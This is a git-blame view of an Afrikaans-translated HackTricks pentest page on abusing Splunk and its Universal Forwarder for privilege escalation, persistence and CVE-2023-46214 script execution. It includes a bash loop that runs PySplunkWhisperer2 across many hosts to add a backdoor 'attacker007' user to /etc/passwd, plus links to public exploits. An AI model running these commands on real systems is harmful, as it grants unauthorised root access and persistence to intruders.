Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md

77 lines
5.2 KiB
Markdown
Raw Normal View History

Translated to Afrikaans
2024-02-11 02:07:06 +00:00
# Splunk LPE en Volharding
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
<details>
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
arte
2023-12-30 20:49:49 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
As jy 'n masjien **intern** of **ekstern ondersoek** en jy vind **Splunk wat loop** (poort 8090), as jy gelukkig enige **geldige geloofsbriewe** ken, kan jy die Splunk-diens misbruik om 'n skul te **uitvoer** as die gebruiker wat Splunk laat loop. As root dit laat loop, kan jy voorregte na root eskaleer.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
As jy reeds root is en die Splunk-diens nie net op die localhost luister nie, kan jy die wagwoordlêer **van** die Splunk-diens **steel** en die wagwoorde **kraak**, of **nuwe** geloofsbriewe daaraan toevoeg. En volharding op die gasheer handhaaf.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
In die eerste prentjie hieronder kan jy sien hoe 'n Splunkd-webblad lyk.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Splunk Universal Forwarder Agent Exploit Opsomming
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Vir verdere besonderhede, kyk na die pos [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). Hierdie is net 'n opsomming:
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Exploit-oorsig:**
'n Exploit wat die Splunk Universal Forwarder Agent (UF) teiken, maak dit vir aanvallers met die agentwagwoord moontlik om arbitrêre kode op stelsels wat die agent laat loop, uit te voer, wat potensieel 'n hele netwerk kan benadeel.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Kernpunte:**
- Die UF-agent valideer nie inkomende verbindings of die egtheid van kode nie, wat dit vatbaar maak vir ongemagtigde kode-uitvoering.
- Gewone metodes vir die verkryging van wagwoorde sluit in die vind daarvan in netwerkgidslys, lêerdeling of interne dokumentasie.
- Suksesvolle uitbuiting kan lei tot toegang op die vlak van SYSTEM of root op gekompromitteerde gasheer, data-uitvoer en verdere netwerkinfiltrasie.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Uitbuiting van Exploit:**
1. Aanvaller verkry die UF-agentwagwoord.
2. Maak gebruik van die Splunk API om opdragte of skripte na die agente te stuur.
3. Moontlike aksies sluit lêeronttrekking, manipulasie van gebruikersrekeninge en stelselkompromittering in.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Impak:**
- Volledige netwerkbenadeling met SYSTEM/root-vlak-toestemmings op elke gasheer.
- Moontlikheid om logboekinskrywings te deaktiveer om opsporing te ontduik.
- Installasie van agterdeure of losprysware.
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Voorbeeldopdrag vir Uitbuiting:**
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
```bash
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Bruikbare openbare exploits:**
GitBook: [master] 2 pages modified
2020-11-06 00:30:40 +00:00
* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
* https://www.exploit-db.com/exploits/46238
* https://www.exploit-db.com/exploits/46487
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Misbruik van Splunk-aanvragen
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
**Vir verdere besonderhede, kyk na die pos [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Die **CVE-2023-46214** het dit moontlik gemaak om 'n willekeurige skripsie na **`$SPLUNK_HOME/bin/scripts`** te laai en het toe verduidelik dat dit moontlik was om die skripsie wat daar gestoor is, uit te voer deur die soekvraag **`|runshellscript script_name.sh`** te gebruik.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
GITBOOK-4174: change request with no subject merged in GitBook
2023-12-04 09:33:43 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
arte
2023-12-30 20:49:49 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Reference in a new issue Copy permalink